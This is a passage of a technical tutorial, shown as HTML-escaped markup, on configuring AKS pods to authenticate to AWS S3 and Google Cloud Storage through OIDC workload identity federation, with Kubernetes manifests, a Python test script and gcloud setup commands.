          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
      &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/aws/tokens&lt;/span&gt;
          &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-aks&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
      &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
              &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
              &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sts.amazonaws.com&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_aws_from_aks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note:&lt;/strong&gt; We use &lt;code&gt;sts.amazonaws.com&lt;/code&gt; as the audience for AWS authentication, which is the AWS best practice. This creates a dedicated token specifically for AWS, separate from the Azure token used in Scenario 2.1.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_aws_from_aks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test AWS S3 access from AKS using Web Identity&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# boto3 automatically uses AWS_WEB_IDENTITY_TOKEN_FILE and AWS_ROLE_ARN
&lt;/span&gt;        &lt;span class="n"&gt;s3_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets
&lt;/span&gt;        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ AWS Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; S3 buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Get caller identity
&lt;/span&gt;        &lt;span class="n"&gt;sts_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;identity&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sts_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_caller_identity&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;🔐 Authenticated as: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;identity&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Arn&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ AWS Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pods &lt;code&gt;kubectl logs -f -n default aks-aws-test&lt;/code&gt;, it means the AKS to AWS Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ AWS Authentication successful!
Found &amp;lt;number of buckets&amp;gt; S3 buckets:
  - bucket-1
  - bucket-2
  - ...

🔐 Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/aks-to-aws-role/botocore-session-&amp;lt;some random number&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Authenticating to GCP from AKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get AKS OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Set up GCP project&lt;/span&gt;
gcloud auth login
gcloud config &lt;span class="nb"&gt;set &lt;/span&gt;project YOUR_PROJECT_ID
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create Workload Identity Pool in GCP&lt;/span&gt;
gcloud iam workload-identity-pools create aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"AKS Pool"&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create OIDC provider (CORRECT audience pattern)&lt;/span&gt;
gcloud iam workload-identity-pools providers create-oidc aks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--issuer-uri&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--allowed-audiences&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"//iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-mapping&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"google.subject=assertion.sub,attribute.service_account=assertion.sub"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub.startsWith('system:serviceaccount:default:aks-cross-cloud-sa')"&lt;/span&gt;

&lt;span class="c"&gt;# 5. Create GCP Service Account&lt;/span&gt;
gcloud iam service-accounts create aks-gcp-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"AKS to GCP Service Account"&lt;/span&gt;

&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"aks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Service Account: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create bucket&lt;/span&gt;
gcloud storage buckets create gs://aks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--uniform-bucket-level-access&lt;/span&gt;

&lt;span class="c"&gt;# 7. Grant GCS permissions to service account&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# 8. Grant bucket-specific permissions (optional, redundant with storage.admin)&lt;/span&gt;
gsutil iam ch serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://aks-cross-cloud

&lt;span class="c"&gt;# 9. Allow workload identity to impersonate - METHOD 1 (using principalSet)&lt;/span&gt;
&lt;span class="c"&gt;# Add the correct bindings with full subject path&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;

gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.serviceAccountTokenCreator &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate the Scenario 2.3, if authentication is working you will see success logs as shown below -&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario2-3-aks-to-gcp.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-gcp-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir google-auth google-cloud-storage &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_gcp_from_aks.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GOOGLE_APPLICATION_CREDENTIALS&lt;/span&gt;
        &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity/config.json&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;
        &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_PROJECT_ID"&lt;/span&gt;  &lt;span class="c1"&gt;# Replace with actual project ID&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/workload-identity&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
        &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens&lt;/span&gt;
        &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-config&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config-aks&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code-aks&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
